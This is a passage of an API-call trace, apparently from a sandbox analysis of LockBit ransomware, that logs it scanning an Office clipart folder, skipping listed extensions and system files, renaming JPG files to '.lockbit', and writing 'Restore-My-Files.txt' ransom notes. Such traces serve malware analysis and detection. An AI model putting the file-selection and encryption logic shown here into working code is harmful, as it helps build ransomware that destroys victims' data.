Office\\CLIPART\\PUB60COR\\J0099165.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.807] malloc (_Size=0xa6) returned 0x77d7a8 [0121.807] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0121.807] free (_Block=0x77d7a8) [0121.807] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.807] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.807] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.807] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562fb9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0xfcff, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099166.JPG", cAlternateFileName="")) returned 1 [0121.807] lstrcmpiW (lpString1=".", lpString2="J0099166.JPG") returned -1 [0121.808] lstrcmpiW (lpString1="..", lpString2="J0099166.JPG") returned -1 [0121.808] PathFindExtensionW (pszPath="J0099166.JPG") returned=".JPG" [0121.808] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0121.808] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0121.808] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0121.808] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0121.808] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0121.808] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0121.808] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0121.808] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0121.808] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0121.808] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0121.808] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0121.808] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0121.808] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0121.808] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0121.808] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0121.808] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0121.808] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0121.808] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0121.808] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0121.808] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0121.808] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0121.808] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0121.808] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0121.808] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0121.808] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.809] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0121.809] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0121.809] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0121.809] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0121.809] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0121.809] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0121.809] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0121.809] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0121.809] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0121.809] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0121.809] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0121.809] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0121.809] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0121.809] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0121.809] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0121.809] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0121.809] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0121.809] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.809] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0121.809] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0121.809] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0121.809] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0121.809] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099166.JPG") returned 1 [0121.809] lstrcmpiW (lpString1="ntldr", lpString2="J0099166.JPG") returned 1 [0121.809] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099166.JPG") returned 1 [0121.809] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099166.JPG") returned -1 [0121.809] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099166.JPG") returned -1 [0121.810] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099166.JPG") returned 1 [0121.810] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099166.JPG") returned -1 [0121.810] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.810] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG") returned=".JPG" [0121.810] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0121.810] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0121.810] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0121.810] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0121.810] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0121.810] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0121.810] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0121.810] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0121.810] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0121.810] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0121.810] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0121.810] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0121.810] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0121.810] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0121.810] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0121.810] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0121.810] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0121.810] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0121.810] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0121.810] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0121.810] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0121.810] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0121.810] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0121.811] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0121.811] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0121.812] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0121.812] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0121.812] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0121.812] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG.lockbit") returned 72 [0121.812] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099166.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0121.814] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.814] malloc (_Size=0x40068) returned 0x3df0008 [0121.814] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=64767) returned 1 [0121.814] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.816] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0121.817] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.817] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0121.818] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0121.834] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.834] malloc (_Size=0xa6) returned 0x77d7a8 [0121.834] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.866] free (_Block=0x77d7a8) [0121.866] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.866] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.867] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.867] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65daa6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0xabad, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099167.JPG", cAlternateFileName="")) returned 1 [0121.867] lstrcmpiW (lpString1=".", lpString2="J0099167.JPG") returned -1 [0121.867] lstrcmpiW (lpString1="..", lpString2="J0099167.JPG") returned -1 [0121.867] PathFindExtensionW (pszPath="J0099167.JPG") returned=".JPG" [0121.867] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0121.867] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0121.867] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0121.867] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0121.867] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0121.867] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0121.867] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0121.867] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0121.867] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0121.867] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0121.867] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0121.867] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0121.867] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0121.867] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0121.867] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0121.867] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0121.867] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0121.867] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0121.868] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0121.868] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0121.868] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0121.868] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0121.868] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0121.868] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0121.868] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.868] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0121.868] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0121.868] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0121.868] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0121.868] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0121.868] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0121.868] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0121.868] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0121.868] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0121.868] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0121.868] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0121.868] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0121.868] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0121.868] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0121.868] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0121.868] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0121.868] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0121.868] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.868] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0121.869] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0121.869] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0121.869] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0121.869] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099167.JPG") returned 1 [0121.869] lstrcmpiW (lpString1="ntldr", lpString2="J0099167.JPG") returned 1 [0121.869] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099167.JPG") returned 1 [0121.869] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099167.JPG") returned -1 [0121.869] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099167.JPG") returned -1 [0121.869] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099167.JPG") returned 1 [0121.869] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099167.JPG") returned -1 [0121.869] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.869] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned=".JPG" [0121.869] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0121.869] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0121.869] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0121.869] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0121.869] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0121.869] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0121.869] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0121.869] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0121.869] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0121.869] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0121.869] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0121.869] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0121.869] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0121.869] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0121.870] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0121.870] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0121.870] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0121.870] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0121.870] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0121.870] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0121.870] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0121.870] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0121.870] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0121.870] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0121.870] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0121.870] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0121.870] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0121.870] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0121.870] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG.lockbit") returned 72 [0121.870] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099167.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0121.871] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.871] malloc (_Size=0x40068) returned 0x3df0008 [0121.871] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=43949) returned 1 [0121.871] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.872] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0121.872] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.872] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0121.873] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0121.879] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.879] malloc (_Size=0xa6) returned 0x77d7a8 [0121.879] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.881] free (_Block=0x77d7a8) [0121.882] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.882] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.882] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.882] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65daa6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x4ed3, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099168.JPG", cAlternateFileName="")) returned 1 [0121.882] lstrcmpiW (lpString1=".", lpString2="J0099168.JPG") returned -1 [0121.882] lstrcmpiW (lpString1="..", lpString2="J0099168.JPG") returned -1 [0121.882] PathFindExtensionW (pszPath="J0099168.JPG") returned=".JPG" [0121.882] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0121.882] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0121.882] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0121.882] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0121.882] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0121.882] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0121.882] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0121.882] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0121.882] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0121.882] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0121.882] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0121.882] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0121.882] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0121.882] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0121.882] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0121.883] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0121.883] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0121.883] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0121.883] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0121.883] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0121.883] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0121.883] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0121.883] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0121.883] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0121.883] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.883] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0121.883] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0121.883] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0121.883] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0121.883] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0121.883] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0121.883] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0121.883] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0121.883] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0121.883] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0121.883] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0121.883] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0121.883] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0121.883] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0121.883] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0121.883] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0121.883] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0121.884] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.884] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0121.884] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0121.884] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0121.884] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0121.884] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099168.JPG") returned 1 [0121.884] lstrcmpiW (lpString1="ntldr", lpString2="J0099168.JPG") returned 1 [0121.884] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099168.JPG") returned 1 [0121.884] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099168.JPG") returned -1 [0121.884] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099168.JPG") returned -1 [0121.884] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099168.JPG") returned 1 [0121.884] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099168.JPG") returned -1 [0121.884] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.884] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned=".JPG" [0121.884] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0121.884] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0121.884] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0121.884] lstrcmpiW (lpString1=".ckp", 